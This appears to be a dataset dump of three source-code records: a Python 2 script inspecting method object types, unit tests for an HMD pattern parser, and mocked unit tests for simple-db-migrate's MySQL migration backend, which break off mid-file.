838e0ac98d5926ba942224951cd1e8bad5483b5e
|
[
"BSD-2-Clause",
"Apache-2.0"
] | null | null | null |
class C(object):
def foo(self):
pass
def __repr__(self):
return 'some C obj'
print type(C.foo)
print type(C.foo.im_func), type(C.foo.__func__)
print type(C.foo.im_self), type(C.foo.__self__)
print type(C.foo.im_class)
print repr(C.foo)
print type(C().foo)
print type(C().foo.im_func), type(C().foo.__func__)
print type(C().foo.im_self), type(C().foo.__self__)
print type(C().foo.im_class)
print repr(C().foo)
# old-style classes
class C:
def foo(self):
pass
def __repr__(self):
return 'some old-style C obj'
print type(C.foo)
print type(C.foo.im_func), type(C.foo.__func__)
print type(C.foo.im_self), type(C.foo.__self__)
print type(C.foo.im_class)
print repr(C.foo)
print type(C().foo)
print type(C().foo.im_func), type(C().foo.__func__)
print type(C().foo.im_self), type(C().foo.__self__)
print type(C().foo.im_class)
print repr(C().foo)
| 22.4
| 51
| 0.672991
| 168
| 896
| 3.279762
| 0.107143
| 0.203267
| 0.348457
| 0.377495
| 0.92559
| 0.92559
| 0.92559
| 0.92559
| 0.92559
| 0.798548
| 0
| 0
| 0.145089
| 896
| 39
| 52
| 22.974359
| 0.719321
| 0.018973
| 0
| 0.866667
| 0
| 0
| 0.034208
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.066667
| 0
| null | null | 0.666667
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 1
|
0
| 13
|
6feca04ba064667ade57c9288c4d2c8e49ec06c0
| 13,360
|
py
|
Python
|
hmd/tests/test_parser.py
|
fossabot/hmd
|
dda00daea71449d7338b573e11a24b2db7dbd7c7
|
[
"MIT"
] | null | null | null |
hmd/tests/test_parser.py
|
fossabot/hmd
|
dda00daea71449d7338b573e11a24b2db7dbd7c7
|
[
"MIT"
] | null | null | null |
hmd/tests/test_parser.py
|
fossabot/hmd
|
dda00daea71449d7338b573e11a24b2db7dbd7c7
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
from src.abstract.automata.automata import AbstractAutomataMachine
from src.abstract.lexer.lexer import AbstractLexer
from src.abstract.lexer.token import AbstractToken
from src.abstract.parser.parser import AbstractParser
from src.mindslab.grammar import HMDGrammar
from src.mindslab.syntax import *
import unittest
class TestParser(unittest.TestCase):
'''
: unit tests for parser class.
'''
lexer = AbstractLexer(HMDSyntaxDefault)
parser = AbstractParser(HMDGrammar())
def test_parser_empty_string(self):
attempt = self.parser.parse('')
answer = []
self.assertEqual(attempt, answer)
def test_parser_empty_list(self):
attempt = self.parser.parse([])
self.assertFalse(attempt)
def test_parser_empty_list_string(self):
attempt = self.parser.parse([''])
self.assertFalse(attempt)
def test_parser_empty_list_strings(self):
attempt = self.parser.parse(['',''])
self.assertFalse(attempt)
#
# syntax: valid
#
#
# syntax: invalid
#
def test_parser_invalid_syntax_empty(self):
hmd = '()'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_leading_double(self):
hmd = '(()'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_trailing_double(self):
hmd = '())'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_nested(self):
hmd = '(())'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_sequel(self):
hmd = '+'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_sequels(self):
hmd = '++'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_sequel_missing_count(self):
hmd = '(+)'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_sequel_missing_count_nested(self):
hmd = '(+())'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_sequel_leading_missing_count(self):
hmd = '+()'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_sequel_trailing_missing_count(self):
hmd = '()+'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_prequel(self):
hmd = '-'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_prequels(self):
hmd = '--'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_prequel_missing_count(self):
hmd = '(-)'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_prequel_missing_count_nested(self):
hmd = '(-())'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_prequel_leading_missing_count(self):
hmd = '-()'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_prequel_trailing_missing_count(self):
hmd = '()-'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_following(self):
hmd = '@'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_followings(self):
hmd = '@@'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_following_missing_count(self):
hmd = '(@)'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_following_missing_count_nested(self):
hmd = '(@())'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_following_leading_missing_count(self):
hmd = '@()'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_following_trailing_missing_count(self):
hmd = '()@'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_not(self):
hmd = '!'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_not_space_between(self):
hmd = '! '
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_nots(self):
hmd = '!!'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_nots_space_between(self):
hmd = '! !'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_not_missing_count(self):
hmd = '(!)'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_not_missing_count_nested(self):
hmd = '(!())'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_not_leading_missing_count(self):
hmd = '!()'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_not_trailing_missing_count(self):
hmd = '()!'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_hat(self):
hmd = '^'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_hats(self):
hmd = '^^'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_hat_space_between(self):
hmd = '^ 1'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_hat_missing_count(self):
hmd = '(^)'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_hat_missing_count_nested(self):
hmd = '(^())'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_hat_leading_missing_count(self):
hmd = '^()'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_hat_trailing_missing_count(self):
hmd = '()^'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_wildcard(self):
hmd = '%'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_wildcards(self):
hmd = '%%'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_wildcard_missing_count(self):
hmd = '(%)'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_wildcard_missing_count_nested(self):
hmd = '(%())'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_wildcard_leading_missing_count(self):
hmd = '%()'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_wildcard_trailing_missing_count(self):
hmd = '()%'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_or(self):
hmd = '|'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_ors(self):
hmd = '||'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_or_missing_count(self):
hmd = '(|)'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_or_missing_count_nested(self):
hmd = '(|())'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_or_leading_missing_count(self):
hmd = '|()'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_or_trailing_missing_count(self):
hmd = '()|'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_identifier(self):
hmd = '$'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_identifiers(self):
hmd = '$$'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_identifier_missing_count(self):
hmd = '($)'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_identifier_missing_count_nested(self):
hmd = '($())'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_identifier_leading_missing_count(self):
hmd = '$()'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_identifier_trailing_missing_count(self):
hmd = '()$'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_assignment(self):
hmd = '='
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_assignments(self):
hmd = '=='
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_not_assignments(self):
hmd = '!='
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_assignment_missing_count(self):
hmd = '(=)'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_assignment_missing_count_nested(self):
hmd = '(=())'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_assignment_leading_missing_count(self):
hmd = '=()'
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
def test_parser_invalid_syntax_assignment_trailing_missing_count(self):
hmd = '()='
tokens = self.lexer.lex(hmd)
attempt = self.parser.parse(tokens)
self.assertFalse(attempt)
| 32.115385
| 75
| 0.646183
| 1,531
| 13,360
| 5.397126
| 0.047028
| 0.150067
| 0.103836
| 0.175723
| 0.929566
| 0.923757
| 0.919158
| 0.919158
| 0.913349
| 0.913349
| 0
| 0.000099
| 0.244386
| 13,360
| 415
| 76
| 32.192771
| 0.818425
| 0.006063
| 0
| 0.57958
| 0
| 0
| 0.013201
| 0
| 0
| 0
| 0
| 0
| 0.198198
| 1
| 0.198198
| false
| 0
| 0.021021
| 0
| 0.228228
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b5176ed252f8654f3eb7185d8b778b19a18c818f
| 27,040
|
py
|
Python
|
tests/mysql_test.py
|
wesrog/simple-db-migrate
|
5d5637cbb96424676571431bb688f8b977b0837d
|
[
"Apache-2.0"
] | 1
|
2017-12-14T22:20:30.000Z
|
2017-12-14T22:20:30.000Z
|
tests/mysql_test.py
|
wesrog/simple-db-migrate
|
5d5637cbb96424676571431bb688f8b977b0837d
|
[
"Apache-2.0"
] | null | null | null |
tests/mysql_test.py
|
wesrog/simple-db-migrate
|
5d5637cbb96424676571431bb688f8b977b0837d
|
[
"Apache-2.0"
] | null | null | null |
import os
import unittest
import simple_db_migrate
from mock import patch, Mock, MagicMock, call
from simple_db_migrate.config import *
from simple_db_migrate.mysql import *
from tests import BaseTest, create_file, create_migration_file, delete_files, create_config
class MySQLTest(BaseTest):
def setUp(self):
self.execute_returns = {}
self.fetchone_returns = {'select count(*) from __db_version__;': [0]}
self.close_returns = {}
self.last_execute_command = '';
self.config_dict = {'database_script_encoding': 'utf8',
'database_encoding': 'utf8',
'database_host': 'localhost',
'database_user': 'root',
'database_password': '',
'database_name': 'migration_test',
'database_version_table': '__db_version__',
'drop_db_first': False
}
self.config_mock = MagicMock(spec_set=dict, wraps=self.config_dict)
self.cursor_mock = Mock(**{"execute": Mock(side_effect=self.execute_side_effect),
"close": Mock(side_effect=self.close_side_effect),
"fetchone": Mock(side_effect=self.fetchone_side_effect)})
self.db_mock = Mock(**{"cursor.return_value": self.cursor_mock})
self.db_driver_mock = Mock(**{"connect.return_value": self.db_mock})
def test_it_should_use_mysqldb_as_driver(self):
mysqldb_mock = MagicMock()
with patch.dict('sys.modules', MySQLdb=mysqldb_mock):
mysql = MySQL(self.config_mock)
self.assertNotEqual(0, mysqldb_mock.connect.call_count)
def test_it_should_stop_process_when_an_error_occur_during_connect_database(self):
self.db_driver_mock.connect.side_effect = Exception("error when connecting")
try:
mysql = MySQL(self.config_mock, self.db_driver_mock)
self.fail("it should not get here")
except Exception, e:
self.assertEqual("could not connect to database: error when connecting", str(e))
self.assertEqual(0, self.db_mock.query.call_count)
self.assertEqual(0, self.db_mock.commit.call_count)
self.assertEqual(0, self.db_mock.close.call_count)
self.assertEqual(0, self.cursor_mock.execute.call_count)
self.assertEqual(0, self.cursor_mock.close.call_count)
def test_it_should_create_database_and_version_table_on_init_if_not_exists(self):
mysql = MySQL(self.config_mock, self.db_driver_mock)
expected_query_calls = [
call('create database if not exists `migration_test`;')
]
self.assertEqual(expected_query_calls, self.db_mock.query.mock_calls)
self.db_mock.select_db.assert_called_with('migration_test')
self.assertEqual(2, self.db_mock.commit.call_count)
self.assertEqual(4, self.db_mock.close.call_count)
expected_execute_calls = [
call('create table if not exists __db_version__ ( id int(11) NOT NULL AUTO_INCREMENT, version varchar(20) NOT NULL default "0", label varchar(255), name varchar(255), sql_up LONGTEXT, sql_down LONGTEXT, PRIMARY KEY (id))'),
call('select count(*) from __db_version__;'),
call('insert into __db_version__ (version) values ("0")')
]
self.assertEqual(expected_execute_calls, self.cursor_mock.execute.mock_calls)
self.assertEqual(3, self.cursor_mock.close.call_count)
def test_it_should_drop_database_on_init_if_its_asked(self):
self.config_dict["drop_db_first"] = True
mysql = MySQL(self.config_mock, self.db_driver_mock)
expected_query_calls = [
call('set foreign_key_checks=0; drop database if exists `migration_test`;'),
call('create database if not exists `migration_test`;')
]
self.assertEqual(expected_query_calls, self.db_mock.query.mock_calls)
self.db_mock.select_db.assert_called_with('migration_test')
self.assertEqual(2, self.db_mock.commit.call_count)
self.assertEqual(5, self.db_mock.close.call_count)
expected_execute_calls = [
call('create table if not exists __db_version__ ( id int(11) NOT NULL AUTO_INCREMENT, version varchar(20) NOT NULL default "0", label varchar(255), name varchar(255), sql_up LONGTEXT, sql_down LONGTEXT, PRIMARY KEY (id))'),
call('select count(*) from __db_version__;'),
call('insert into __db_version__ (version) values ("0")')
]
self.assertEqual(expected_execute_calls, self.cursor_mock.execute.mock_calls)
self.assertEqual(3, self.cursor_mock.close.call_count)
def test_it_should_stop_process_when_an_error_occur_during_drop_database(self):
self.config_dict["drop_db_first"] = True
self.db_mock.query.side_effect = Exception("error when dropping")
try:
mysql = MySQL(self.config_mock, self.db_driver_mock)
self.fail("it should not get here")
except Exception, e:
self.assertEqual("can't drop database 'migration_test'; \nerror when dropping", str(e))
expected_query_calls = [
call('set foreign_key_checks=0; drop database if exists `migration_test`;')
]
self.assertEqual(expected_query_calls, self.db_mock.query.mock_calls)
self.assertEqual(0, self.db_mock.commit.call_count)
self.assertEqual(1, self.db_mock.close.call_count)
self.assertEqual(0, self.cursor_mock.execute.call_count)
self.assertEqual(0, self.cursor_mock.close.call_count)
def test_it_should_execute_migration_up_and_update_schema_version(self):
mysql = MySQL(self.config_mock, self.db_driver_mock)
mysql.change("create table spam();", "20090212112104", "20090212112104_test_it_should_execute_migration_down_and_update_schema_version.migration", "create table spam();", "drop table spam;")
expected_query_calls = [
call('create database if not exists `migration_test`;')
]
self.assertEqual(expected_query_calls, self.db_mock.query.mock_calls)
self.db_mock.select_db.assert_called_with('migration_test')
self.assertEqual(4, self.db_mock.commit.call_count)
self.assertEqual(6, self.db_mock.close.call_count)
expected_execute_calls = [
call('create table if not exists __db_version__ ( id int(11) NOT NULL AUTO_INCREMENT, version varchar(20) NOT NULL default "0", label varchar(255), name varchar(255), sql_up LONGTEXT, sql_down LONGTEXT, PRIMARY KEY (id))'),
call('select count(*) from __db_version__;'),
call('insert into __db_version__ (version) values ("0")'),
call('create table spam()'),
call('insert into __db_version__ (version, label, name, sql_up, sql_down) values ("20090212112104", NULL, "20090212112104_test_it_should_execute_migration_down_and_update_schema_version.migration", "create table spam();", "drop table spam;");')
]
self.assertEqual(expected_execute_calls, self.cursor_mock.execute.mock_calls)
self.assertEqual(5, self.cursor_mock.close.call_count)
def test_it_should_execute_migration_down_and_update_schema_version(self):
mysql = MySQL(self.config_mock, self.db_driver_mock)
mysql.change("drop table spam;", "20090212112104", "20090212112104_test_it_should_execute_migration_down_and_update_schema_version.migration", "create table spam();", "drop table spam;", False)
expected_query_calls = [
call('create database if not exists `migration_test`;')
]
self.assertEqual(expected_query_calls, self.db_mock.query.mock_calls)
self.db_mock.select_db.assert_called_with('migration_test')
self.assertEqual(4, self.db_mock.commit.call_count)
self.assertEqual(6, self.db_mock.close.call_count)
expected_execute_calls = [
call('create table if not exists __db_version__ ( id int(11) NOT NULL AUTO_INCREMENT, version varchar(20) NOT NULL default "0", label varchar(255), name varchar(255), sql_up LONGTEXT, sql_down LONGTEXT, PRIMARY KEY (id))'),
call('select count(*) from __db_version__;'),
call('insert into __db_version__ (version) values ("0")'),
call('drop table spam'),
call('delete from __db_version__ where version = "20090212112104";')
]
self.assertEqual(expected_execute_calls, self.cursor_mock.execute.mock_calls)
self.assertEqual(5, self.cursor_mock.close.call_count)
def test_it_should_use_label_version_when_updating_schema_version(self):
mysql = MySQL(self.config_mock, self.db_driver_mock)
mysql.change("create table spam();", "20090212112104", "20090212112104_test_it_should_execute_migration_down_and_update_schema_version.migration", "create table spam();", "drop table spam;", label_version="label")
expected_query_calls = [
call('create database if not exists `migration_test`;')
]
self.assertEqual(expected_query_calls, self.db_mock.query.mock_calls)
self.db_mock.select_db.assert_called_with('migration_test')
self.assertEqual(4, self.db_mock.commit.call_count)
self.assertEqual(6, self.db_mock.close.call_count)
expected_execute_calls = [
call('create table if not exists __db_version__ ( id int(11) NOT NULL AUTO_INCREMENT, version varchar(20) NOT NULL default "0", label varchar(255), name varchar(255), sql_up LONGTEXT, sql_down LONGTEXT, PRIMARY KEY (id))'),
call('select count(*) from __db_version__;'),
call('insert into __db_version__ (version) values ("0")'),
call('create table spam()'),
call('insert into __db_version__ (version, label, name, sql_up, sql_down) values ("20090212112104", "label", "20090212112104_test_it_should_execute_migration_down_and_update_schema_version.migration", "create table spam();", "drop table spam;");')
]
self.assertEqual(expected_execute_calls, self.cursor_mock.execute.mock_calls)
self.assertEqual(5, self.cursor_mock.close.call_count)
def test_it_should_raise_whem_migration_sql_has_a_syntax_error(self):
mysql = MySQL(self.config_mock, self.db_driver_mock)
self.assertRaisesWithMessage(Exception, "error executing migration: invalid sql syntax 'create table foo(); create table spam());'", mysql.change,
"create table foo(); create table spam());", "20090212112104", "20090212112104_test_it_should_execute_migration_down_and_update_schema_version.migration", "create table foo(); create table spam());", "drop table spam;", label_version="label")
def test_it_should_stop_process_when_an_error_occur_during_database_change(self):
self.execute_returns["insert into spam"] = Exception("invalid sql")
try:
mysql = MySQL(self.config_mock, self.db_driver_mock)
mysql.change("create table spam(); insert into spam", "20090212112104", "20090212112104_test_it_should_execute_migration_down_and_update_schema_version.migration", "create table spam();", "drop table spam;", label_version="label")
except Exception, e:
self.assertEqual("error executing migration: invalid sql\n\n[ERROR DETAILS] SQL command was:\ninsert into spam", str(e))
self.assertTrue(isinstance(e, simple_db_migrate.core.exceptions.MigrationException))
expected_query_calls = [
call('create database if not exists `migration_test`;')
]
self.assertEqual(expected_query_calls, self.db_mock.query.mock_calls)
self.db_mock.select_db.assert_called_with('migration_test')
self.assertEqual(1, self.db_mock.rollback.call_count)
self.assertEqual(2, self.db_mock.commit.call_count)
self.assertEqual(5, self.db_mock.close.call_count)
expected_execute_calls = [
call('create table if not exists __db_version__ ( id int(11) NOT NULL AUTO_INCREMENT, version varchar(20) NOT NULL default "0", label varchar(255), name varchar(255), sql_up LONGTEXT, sql_down LONGTEXT, PRIMARY KEY (id))'),
call('select count(*) from __db_version__;'),
call('insert into __db_version__ (version) values ("0")'),
call('create table spam()'),
call('insert into spam')
]
self.assertEqual(expected_execute_calls, self.cursor_mock.execute.mock_calls)
self.assertEqual(3, self.cursor_mock.close.call_count)
def test_it_should_stop_process_when_an_error_occur_during_log_schema_version(self):
self.execute_returns['insert into __db_version__ (version, label, name, sql_up, sql_down) values ("20090212112104", "label", "20090212112104_test_it_should_execute_migration_down_and_update_schema_version.migration", "create table spam();", "drop table spam;");'] = Exception("invalid sql")
try:
mysql = MySQL(self.config_mock, self.db_driver_mock)
mysql.change("create table spam();", "20090212112104", "20090212112104_test_it_should_execute_migration_down_and_update_schema_version.migration", "create table spam();", "drop table spam;", label_version="label")
except Exception, e:
self.assertEqual('error logging migration: invalid sql\n\n[ERROR DETAILS] SQL command was:\n20090212112104_test_it_should_execute_migration_down_and_update_schema_version.migration', str(e))
self.assertTrue(isinstance(e, simple_db_migrate.core.exceptions.MigrationException))
expected_query_calls = [
call('create database if not exists `migration_test`;')
]
self.assertEqual(expected_query_calls, self.db_mock.query.mock_calls)
self.db_mock.select_db.assert_called_with('migration_test')
self.assertEqual(1, self.db_mock.rollback.call_count)
self.assertEqual(3, self.db_mock.commit.call_count)
self.assertEqual(6, self.db_mock.close.call_count)
expected_execute_calls = [
call('create table if not exists __db_version__ ( id int(11) NOT NULL AUTO_INCREMENT, version varchar(20) NOT NULL default "0", label varchar(255), name varchar(255), sql_up LONGTEXT, sql_down LONGTEXT, PRIMARY KEY (id))'),
call('select count(*) from __db_version__;'),
call('insert into __db_version__ (version) values ("0")'),
call('create table spam()'),
call('insert into __db_version__ (version, label, name, sql_up, sql_down) values ("20090212112104", "label", "20090212112104_test_it_should_execute_migration_down_and_update_schema_version.migration", "create table spam();", "drop table spam;");')
]
self.assertEqual(expected_execute_calls, self.cursor_mock.execute.mock_calls)
self.assertEqual(4, self.cursor_mock.close.call_count)
def test_it_should_log_execution_when_a_function_is_given_when_updating_schema_version(self):
execution_log_mock = Mock()
mysql = MySQL(self.config_mock, self.db_driver_mock)
mysql.change("create table spam();", "20090212112104", "20090212112104_test_it_should_execute_migration_down_and_update_schema_version.migration", "create table spam();", "drop table spam;", execution_log=execution_log_mock)
expected_execution_log_calls = [
call('create table spam()\n-- 0 row(s) affected\n'),
call('migration 20090212112104_test_it_should_execute_migration_down_and_update_schema_version.migration registered\n')
]
self.assertEqual(expected_execution_log_calls, execution_log_mock.mock_calls)
def test_it_should_get_current_schema_version(self):
self.fetchone_returns = {'select count(*) from __db_version__;': [0], 'select version from __db_version__ order by id desc limit 0,1;': ["0"]}
mysql = MySQL(self.config_mock, self.db_driver_mock)
self.assertEqual("0", mysql.get_current_schema_version())
expected_query_calls = [
call('create database if not exists `migration_test`;')
]
self.assertEqual(expected_query_calls, self.db_mock.query.mock_calls)
self.db_mock.select_db.assert_called_with('migration_test')
self.assertEqual(2, self.db_mock.commit.call_count)
self.assertEqual(5, self.db_mock.close.call_count)
expected_execute_calls = [
call('create table if not exists __db_version__ ( id int(11) NOT NULL AUTO_INCREMENT, version varchar(20) NOT NULL default "0", label varchar(255), name varchar(255), sql_up LONGTEXT, sql_down LONGTEXT, PRIMARY KEY (id))'),
call('select count(*) from __db_version__;'),
call('insert into __db_version__ (version) values ("0")'),
call('select version from __db_version__ order by id desc limit 0,1;')
]
self.assertEqual(expected_execute_calls, self.cursor_mock.execute.mock_calls)
self.assertEqual(4, self.cursor_mock.close.call_count)
def test_it_should_get_all_schema_versions(self):
expected_versions = []
expected_versions.append("0")
expected_versions.append("20090211120001")
expected_versions.append("20090211120002")
expected_versions.append("20090211120003")
self.cursor_mock.fetchall.return_value = tuple(zip(expected_versions))
mysql = MySQL(self.config_mock, self.db_driver_mock)
schema_versions = mysql.get_all_schema_versions()
self.assertEquals(len(expected_versions), len(schema_versions))
for version in schema_versions:
self.assertTrue(version in expected_versions)
expected_query_calls = [
call('create database if not exists `migration_test`;')
]
self.assertEqual(expected_query_calls, self.db_mock.query.mock_calls)
self.db_mock.select_db.assert_called_with('migration_test')
self.assertEqual(2, self.db_mock.commit.call_count)
self.assertEqual(5, self.db_mock.close.call_count)
expected_execute_calls = [
call('create table if not exists __db_version__ ( id int(11) NOT NULL AUTO_INCREMENT, version varchar(20) NOT NULL default "0", label varchar(255), name varchar(255), sql_up LONGTEXT, sql_down LONGTEXT, PRIMARY KEY (id))'),
call('select count(*) from __db_version__;'),
call('insert into __db_version__ (version) values ("0")'),
call('select version from __db_version__ order by id;')
]
self.assertEqual(expected_execute_calls, self.cursor_mock.execute.mock_calls)
self.assertEqual(4, self.cursor_mock.close.call_count)
def test_it_should_get_all_schema_migrations(self):
expected_versions = []
expected_versions.append([1, "0", None, None, None, None])
expected_versions.append([2, "20090211120001", "label", "20090211120001_name", "sql_up", "sql_down"])
self.cursor_mock.fetchall.return_value = tuple(expected_versions)
mysql = MySQL(self.config_mock, self.db_driver_mock)
schema_migrations = mysql.get_all_schema_migrations()
self.assertEquals(len(expected_versions), len(schema_migrations))
for index, migration in enumerate(schema_migrations):
self.assertEqual(migration.id, expected_versions[index][0])
self.assertEqual(migration.version, expected_versions[index][1])
self.assertEqual(migration.label, expected_versions[index][2])
self.assertEqual(migration.file_name, expected_versions[index][3])
self.assertEqual(migration.sql_up, expected_versions[index][4] and expected_versions[index][4] or "")
self.assertEqual(migration.sql_down, expected_versions[index][5] and expected_versions[index][5] or "")
expected_query_calls = [
call('create database if not exists `migration_test`;')
]
self.assertEqual(expected_query_calls, self.db_mock.query.mock_calls)
self.db_mock.select_db.assert_called_with('migration_test')
self.assertEqual(2, self.db_mock.commit.call_count)
self.assertEqual(5, self.db_mock.close.call_count)
expected_execute_calls = [
call('create table if not exists __db_version__ ( id int(11) NOT NULL AUTO_INCREMENT, version varchar(20) NOT NULL default "0", label varchar(255), name varchar(255), sql_up LONGTEXT, sql_down LONGTEXT, PRIMARY KEY (id))'),
call('select count(*) from __db_version__;'),
call('insert into __db_version__ (version) values ("0")'),
call('select id, version, label, name, sql_up, sql_down from __db_version__ order by id;')
]
self.assertEqual(expected_execute_calls, self.cursor_mock.execute.mock_calls)
self.assertEqual(4, self.cursor_mock.close.call_count)
def test_it_should_parse_sql_statements(self):
